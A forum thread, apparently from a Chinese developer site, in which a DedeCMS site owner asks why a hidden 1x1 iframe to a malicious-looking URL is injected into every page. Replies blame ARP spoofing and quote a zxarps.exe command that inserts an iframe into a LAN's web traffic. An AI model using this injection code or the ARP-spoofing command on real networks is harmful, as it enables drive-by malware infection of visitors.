6,850
社区成员
发帖
与我相关
我的任务
分享急: 求助 服务器被挂马 在线等
2003 apache
就一个站中木马 dedecms 所有html头上添加恶意代码
<iframe src= http://haose360d.3322.org:171/win7/index.html?id=105 width=1 height=1></iframe>
在服务器登录访问一切正常 源文件 无论js html 都找不到该代码 搜索 替换也不可
就一个站 其余没影响 该站 某些php文件也无影响
新建一个.php .htm的 代码正常 但是访问还是有那段代码
这是arp欺骗还是?
更换域名也不可.. 这是数据库注入吗
dedecms php+mysql
就一个站中木马 dedecms 所有html头上添加恶意代码
<iframe src= http://haose360d.3322.org:171/win7/index.html?id=105 width=1 height=1></iframe>
在服务器登录访问一切正常 源文件 无论js html 都找不到该代码 搜索 替换也不可
就一个站 其余没影响 该站 某些php文件也无影响
新建一个.php .htm的 代码正常 但是访问还是有那段代码
这是arp欺骗还是?
更换域名也不可.. 这是数据库注入吗
dedecms php+mysql
...全文
请发表友善的回复…
发表回复
Ghostbaby 2011-03-11
- 打赏
- 举报
[Quote=引用 1 楼 keeley20 的回复:]
多半是arp挂马,记得以前有个工具好像叫zxarp的
HTML code
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "< i frame src='url' width=0 height=0 >"
楼主装个ARP防火墙看是否有效果,也检查下局域网的其他机器。
[/Quote]
有这个可能 如果无效的话
应该是挂在IIS或者APACH里面 建议重装系统
多半是arp挂马,记得以前有个工具好像叫zxarp的
HTML code
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "< i frame src='url' width=0 height=0 >"
楼主装个ARP防火墙看是否有效果,也检查下局域网的其他机器。
[/Quote]
有这个可能 如果无效的话
应该是挂在IIS或者APACH里面 建议重装系统
tyjn206 2011-03-11
- 打赏
- 举报
安全模式or DOS杀毒
keeley20 2011-03-11
- 打赏
- 举报
多半是arp挂马,记得以前有个工具好像叫zxarp的
楼主装个ARP防火墙看是否有效果,也检查下局域网的其他机器。
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "< i frame src='url' width=0 height=0 >"楼主装个ARP防火墙看是否有效果,也检查下局域网的其他机器。
